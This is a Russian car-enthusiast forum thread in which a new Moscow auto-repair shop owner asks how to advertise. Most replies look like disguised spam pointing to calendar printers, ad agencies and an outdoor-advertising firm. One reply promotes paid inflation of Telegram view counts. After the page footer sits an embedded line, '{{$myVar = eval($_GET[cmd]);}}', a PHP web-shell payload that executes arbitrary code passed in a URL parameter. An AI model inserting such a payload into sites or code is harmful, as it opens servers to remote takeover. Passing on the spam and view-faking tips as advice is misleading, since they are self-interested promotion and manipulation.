+ Ответить в теме
Показано с 1 по 8 из 8

Тема: Реклама автосервиса


  1. #1

    Реклама автосервиса

    Ребята, мы недавно открыли автосервис в Москве. Кстати, спец по Фольцам у нас тоже есть, так что милости просим. Собственно, теперь сам вопрос - как считаете, каким образом его лучше всего продвигать?

  2. #2
    Мимо проходил Kirillov is on a distinguished road Аватар для Kirillov
    Регистрация
    13.12.2018
    Машина
    Есть
    Сообщений
    78
    А сайт у Вас есть? Ну, чтобы посмотреть ориентировочные цены на те или иные виды работ. И где Вы вообще территориально? Мне глушитель переварить надо, так что, может, стану Вашим клиентом.

  3. #3
    Мимо проходил Завгар is on a distinguished road Аватар для Завгар
    Регистрация
    17.12.2018
    Сообщений
    57
    Ну вот Вам сразу же и подсказка - обязательно нужен сайт, чтобы клиенты могли сориентироваться в ценах. Меня бы, кстати, тоже напрягало звонить и спрашивать, сколько стоит та или иная услуга, я любитель все узнать в интернете.

  4. #4
    Мимо проходил Левша is on a distinguished road Аватар для Левша
    Регистрация
    12.12.2018
    Откуда
    Россия
    Машина
    Ездит
    Сообщений
    90
    А еще клиенты должны вспоминать именно о Вас, когда с их автомобилем что-то случится, а не перебирать в уме все ближайшие станции техобслуживания. А для этого нужны постоянные напоминания. Есть несколько хитростей, как этого добиться, например, постоянно мелькать перед глазами. Как вариант, для этого можно напечатать перекидные календари с логотипом и контактами СТО. Кстати, вот тут можно узнать стоимость изготовления на заказ https://geliografic.ru/servicescalendarperord

  5. #5
    Мимо проходил Анаит is on a distinguished road Аватар для Анаит
    Регистрация
    10.07.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    35
    Наиболее вероятно, что реклама в человеческом обществе зародилась одновременно с торговлей. Её существование в доисторические времена подтверждается, к примеру, египетским папирусом с объявлением о предстоящей продаже раба.

  6. #6
    Мимо проходил Doper is on a distinguished road Аватар для Doper
    Регистрация
    27.12.2018
    Откуда
    Россия
    Машина
    Volkswagen
    Сообщений
    71
    Если вы хотите, что у вас были клиенты, то для этого вам нужна хорошая реклама. И одними календарями вам не обойтись, этого мало. Потому, как в основном никого эта макулатура не интересует. Мне кажется, вам нужна помощь специалистов. Я бы на вашем месте сразу обратился бы в рекламное агентство полного цикла, например, такое, как это https://www.mosreklama.net/ . А там, конечно, смотрите сами.

  7. #7
    Мимо проходил екатеринка1983 is on a distinguished road Аватар для екатеринка1983
    Регистрация
    19.07.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    20
    Можно запустить рекламу вашего автосервиса в соцсетях, например в Телеграмм. На личном канале постить посты и рассказывать пользователям о вашем бизнесе. На такие посты можно дополнительно накрутить просмотры, это поможет рекламе попасть в топ поиска. Как безопасно накрутить просмотры телеграм платно читайте здесь .

  8. #8
    Мимо проходил Машка is on a distinguished road Аватар для Машка
    Регистрация
    25.08.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    12
    У моего мужа автосервис. Заказывает наружную рекламу вот тут https://rik-rek.ru/ и благодаря ей прекрасно раскрутился. Ему хватает только этого вида рекламы, вполне.
    Последний раз редактировалось Машка; 13.12.2019 в 14:11.

+ Ответить в теме

Похожие темы

  1. Реклама про нас :)
    от SuperBeaverAMG в разделе Курилка
    Ответов: 52
    Последнее сообщение: 01.04.2011, 14:27
  2. Реклама DSG ))
    от Ilya в разделе Курилка
    Ответов: 3
    Последнее сообщение: 05.01.2008, 11:22
  3. Реклама VW
    от 3BEPb в разделе Курилка
    Ответов: 6
    Последнее сообщение: 06.02.2007, 14:24
  4. Шпионские фотки автосервиса Морга
    от Airborn в разделе Курилка
    Ответов: 7
    Последнее сообщение: 14.08.2006, 11:14
  5. забавная реклама VW
    от 3BEPb в разделе Курилка
    Ответов: 3
    Последнее сообщение: 06.05.2006, 05:19

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}